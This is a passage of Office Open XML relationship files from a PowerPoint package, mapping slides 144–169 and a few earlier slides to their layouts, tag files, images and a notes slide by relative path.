<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1271.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag556.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag555.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag554.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag553.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag552.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide145.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1281.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag560.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag559.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag558.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag557.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide146.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1291.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag564.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag563.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag562.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag561.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide147.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1301.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag568.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag567.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag566.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag565.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide148.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1311.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag572.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag571.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag570.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag569.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide149.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1321.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag576.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag575.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag574.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag573.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag54.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag53.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag52.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag51.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide150.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1331.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag577.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide151.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag581.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag580.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1341.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.svg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.svg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag579.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.svg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.svg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.svg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.svg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.svg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.svg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag578.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide152.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1351.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide153.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1361.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide154.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1371.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag583.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag582.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide155.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag592.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag591.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag590.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag589.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag588.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag587.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag586.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag585.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1381.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag596.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag595.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag594.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag593.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag584.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide156.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1392.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag599.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag598.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag597.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide157.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1402.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag602.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag601.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag600.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide158.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1411.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag606.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag605.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag604.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag603.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide159.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1421.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag611.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag610.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag609.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag608.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag607.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag58.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag57.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag56.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag55.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide160.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1431.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.jpeg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag616.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag615.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag614.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag613.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag612.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide161.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1441.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag620.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag619.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag618.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag617.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide162.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1451.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag624.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag623.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag622.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag621.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide163.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1461.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag628.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag627.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag626.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag625.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide164.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1471.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag632.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag631.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag630.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag629.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide165.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1481.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag636.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag635.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag634.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag633.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide166.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1491.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag640.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag639.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag638.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag637.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide167.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1501.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag644.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag643.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag642.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag641.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide168.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1511.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag648.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag647.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag646.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag645.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide169.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1521.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag652.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag651.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag650.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag649.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag59.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide170.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
